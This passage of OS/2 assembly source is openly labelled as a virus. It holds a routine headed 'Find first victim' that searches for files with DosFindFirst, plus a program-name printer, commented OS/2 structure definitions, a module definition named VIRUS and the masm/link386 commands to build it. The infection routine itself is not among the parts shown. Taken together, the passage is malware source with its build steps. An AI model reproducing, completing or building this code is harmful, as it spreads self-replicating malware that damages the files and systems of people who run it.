mov BX,DI ; program name address
mov CX,-1 ; find length
repne scasb ; scan for null byte
not CX ; convert CX to length
dec CX
mov [MySize],CX ; return length
PrintIt Hello, 22
push 1 ; stdout handle
push ES ; segment for command line
push BX ; OFFSET of program name
push [MySize] ; length of program name
push DS
push OFFSET Written ; bytes written variable
call DosWrite ; like int 21/40
PrintIt CRLF,5
ret
GetName ENDP
;--------------------------------------------------------------------
;---( Find first victim )--------------------------------------------
;--------------------------------------------------------------------
FindIt PROC near
push DS
push OFFSET FileSpec
push SS ; SEGMENT of directory handle
lea AX, DirHandle ; OFFSET of directory handle
push AX
push 07h ; attribute
push DS ; SEGMENT of buffer
push OFFSET Buf ; OFFSET of buffer
push SIZE Buf ; length of buffer
push DS ; SEGMENT of search count
lea AX, SrchCount ; OFFSET of search count
push AX
push 0 ; Reserved
push 0
call DosFindFirst ; Find first file
ret ; like int 21/4E
FindIt ENDP
;--------------------------------------------------------------------
_TEXT ENDS
END start
;--------------------------------------------------------------------
;--( FTIME structure from OS2.INC )----------------------------------
;--------------------------------------------------------------------
;FTIME STRUC
; ftime_fs DW ?
;FTIME ENDS
;ftime_twosecs EQU 01fh
;ftime_minutes EQU 07e0h
;ftime_hours EQU 0f800h
;--------------------------------------------------------------------
;--( FDATE structure from OS2.INC )----------------------------------
;--------------------------------------------------------------------
;FDATE STRUC
; fdate_fs DW ?
;FDATE ENDS
;fdate_day EQU 01fh
;fdate_month EQU 01e0h
;fdate_year EQU 0fe00h
;--------------------------------------------------------------------
;--( FileFindBuf structure from OS2.INC )----------------------------
;--------------------------------------------------------------------
;FILEFINDBUF STRUC
;findbuf_fdateCreation DB SIZE FDATE DUP (?)
;findbuf_ftimeCreation DB SIZE FTIME DUP (?)
;findbuf_fdateLastAccess DB SIZE FDATE DUP (?)
;findbuf_ftimeLastAccess DB SIZE FTIME DUP (?)
;findbuf_fdateLastWrite DB SIZE FDATE DUP (?)
;findbuf_ftimeLastWrite DB SIZE FTIME DUP (?)
;findbuf_cbFile DD ?
;findbuf_cbFileAlloc DD ?
;findbuf_attrFile DW ?
;findbuf_cchName DB ?
;findbuf_achName DB 256 DUP (?)
;FILEFINDBUF ENDS
;---------------------------------------------------------------------
---------------------------------------------------------------------
NAME VIRUS WINDOWCOMPAT
PROTMODE
STACKSIZE 8192
----------------------------------------------------------------------
masm /Zi %1;
link386 /exepack %1,,,c:\os2\doscalls,virus.def